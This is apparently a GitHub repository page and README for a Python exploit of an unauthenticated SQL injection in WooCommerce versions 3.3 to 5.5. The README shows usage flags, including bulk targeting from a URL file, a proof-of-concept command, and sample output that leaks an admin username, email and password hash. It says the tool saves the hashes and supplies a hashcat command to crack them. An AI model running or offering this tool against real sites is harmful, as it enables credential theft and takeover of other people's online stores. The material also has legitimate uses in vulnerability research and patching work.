https://github.com/randomrobbiebf/woo
Exploit woocommerce SQLI and grab user and password hash
Last synced: 11 months ago
- Host: GitHub
- URL: https://github.com/randomrobbiebf/woo
- Owner: RandomRobbieBF
- Created: 2021-07-20T14:34:55.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2021-07-30T08:45:34.000Z (over 4 years ago)
- Last Synced: 2025-01-21T05:41:44.358Z (about 1 year ago)
- Language: Python
- Size: 5.86 KB
- Stars: 2
- Watchers: 2
- Forks: 1
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# Woocommerce 3.3 to 5.5 - Unauthenticated SQL Injection
https://wpscan.com/vulnerability/1212fec8-1fde-41e5-af70-abdd7ffe5379
Exploit woocommerce SQLI and grab user and password hash
Commands
---
```
usage: woo.py [-h] [-u URL] [-f FILE] [-p PROXY] [-i WID]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL to test
  -f FILE, --file FILE  File of urls
  -p PROXY, --proxy PROXY
                        Proxy for debugging
  -i WID, --wid WID     User ID of User
```
POC
---
```
python3 woo.py -u https://www.website.com -i 1
```
```
Admin ID: 2
Admin Username: admin@website.com
Admin Email Address: admin@admin.com
Admin Password Hash:$P$BIAtNs11r0CBJZxa3B1JLrFd5C9f7r/
```
Every time this is run, it writes the hashes to wphash.has and gives you a hashcat command to crack them.